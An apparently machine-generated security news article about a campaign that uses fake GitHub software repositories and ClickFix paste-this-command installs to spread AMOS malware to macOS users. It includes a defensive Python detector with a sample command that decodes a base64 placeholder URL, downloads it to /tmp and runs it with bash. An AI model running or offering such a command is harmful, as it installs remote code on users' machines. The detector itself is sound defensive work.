Ethical Hacking News
LastPass has warned its users of a malicious campaign targeting macOS users with fake password managers that deliver the Atomic (AMOS) info-stealing malware. The attackers have created numerous deceptive GitHub repositories that impersonate popular products to spread the malware, which is offered as a malware-as-a-service operation for $1,000 per month and targets data on infected machines.
LastPass warns its users about a malicious campaign targeting macOS users with fake password managers delivering Atomic (AMOS) info-stealing malware. The attackers use ClickFix attacks, tricking victims into running commands they don't understand on their systems. The malware is spread through deceptive GitHub repositories that impersonate popular products and are optimized to rank high in search results. Users should be cautious about running commands they don't understand and should rely on official websites when looking for software online. Avoid installing macOS versions of software from unknown sources or untrusted vendors.
LastPass has issued a warning to its users regarding a malicious campaign targeting macOS users with fake password managers that deliver the Atomic (AMOS) info-stealing malware. The malware is being spread through ClickFix attacks, which involve tricking victims into running commands they do not understand on their systems.
The attackers have created numerous deceptive GitHub repositories under multiple accounts to evade takedown, and have optimized them to rank high in search results. These repositories impersonate popular products such as 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
Once a user visits one of these GitHub repositories, they are prompted to download an install.sh file that is executed via the Terminal. The command performs a curl request to a base64-encoded URL and downloads the AMOS payload (install.sh) to the /tmp directory. This is a typical 'ClickFix' attack that takes advantage of the victim not understanding what the command does on their system.
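A defender-side check for the command pattern described above, as an added example (not code from LastPass or from this article): it decodes base64 runs in a pasted command and flags a hidden URL combined with a downloader, shell execution and a write to /tmp. The sample commands, the `example.invalid` URL and all function names are constructed for illustration.

```python
import base64
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # long base64-looking runs
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
# A shell fed by a pipe, run with -c, or pointed at a file under /tmp.
EXEC_RE = re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+(-c\b|/tmp/)")
TMP_RE = re.compile(r"/tmp/\S+")

# Constructed samples, not the campaign's real command; the URLs are placeholders.
_ENC = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE_CLICKFIX = ("curl -fsSL $(echo " + _ENC + " | base64 -d)"
                   " -o /tmp/install.sh && bash /tmp/install.sh")
SAMPLE_BENIGN = "curl -fsSLO https://example.com/releases/tool-1.2.3.tar.gz"


def hidden_urls(command):
    """Return URLs that only become visible after base64-decoding parts of the command."""
    urls = []
    for blob in B64_RE.findall(command):
        try:
            padded = blob + "=" * (-len(blob) % 4)
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if re.match(r"https?://", text):
            urls.append(text.strip())
    return urls


def inspect_command(command):
    """Return a list of ClickFix indicators found in a command a web page asks you to paste."""
    findings = []
    urls = hidden_urls(command)
    downloader = DOWNLOADER_RE.search(command)
    if urls:
        findings.append("base64-hidden URL: " + ", ".join(urls))
    if urls and downloader:
        findings.append("downloader fetches the hidden URL")
    if downloader and EXEC_RE.search(command):
        findings.append("downloaded content is executed by a shell")
    if downloader and TMP_RE.search(command):
        findings.append("payload is written to /tmp")
    return findings


if __name__ == "__main__":
    for cmd in (SAMPLE_CLICKFIX, SAMPLE_BENIGN):
        print(cmd, "->", inspect_command(cmd) or "no ClickFix indicators")
```

The same function can be run over saved shell history or proxy logs to find commands that were already pasted; an empty list means only that these specific indicators were not found.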
The campaign uses Atomic, a malware-as-a-service operation that is offered for $1,000 per month and typically targets data on infected machines. Recently, the developers of the malware added a backdoor component, giving attackers persistent, stealthy access to compromised systems.
LastPass says that apart from its product, the campaign impersonates more than 100 software solutions. The attackers created these repositories with a "download button" that directs visitors to a secondary site, where they are prompted to paste a command into the Terminal to perform the installation.
To avoid falling for ClickFix attacks, users should be cautious of running commands on their systems that they do not understand. When looking for software online, it is recommended to trust the official website of the vendor or project. If a macOS version isn't available there, chances are an unofficial variant is fake.
In the case of a macOS port, users should make sure that it comes from a reputable vendor that has been vetted by the community.
In conclusion, LastPass has issued a warning to its users regarding a malicious campaign targeting macOS users with fake password managers that deliver the Atomic (AMOS) info-stealing malware. This is not the first time such an attack has occurred: BleepingComputer previously reported on similar campaigns impersonating Booking.com and, more recently, one that used ads to promote fake solutions to macOS-specific problems.
The attackers continue to evade takedown by using automation from new accounts to create new repositories. It is therefore crucial for users to be cautious about running commands they do not understand on their systems, and to rely on the official website of the vendor or project when looking for software online.
Related Information:
https://www.ethicalhackingnews.com/articles/LastPass-Mac-Users-Warned-of-Fake-Password-Managers-with-Malicious-Software-ehn.shtml
https://www.bleepingcomputer.com/news/security/lastpass-fake-password-managers-infect-mac-users-with-malware/
https://www.bleepingcomputer.com/news/security/atomic-macos-infostealer-adds-backdoor-for-persistent-attacks/
https://www.securityweek.com/hundreds-targeted-in-new-atomic-macos-stealer-campaign/
Published: Mon Sep 22 11:42:22 2025 by llama3.2 3B Q4_K_M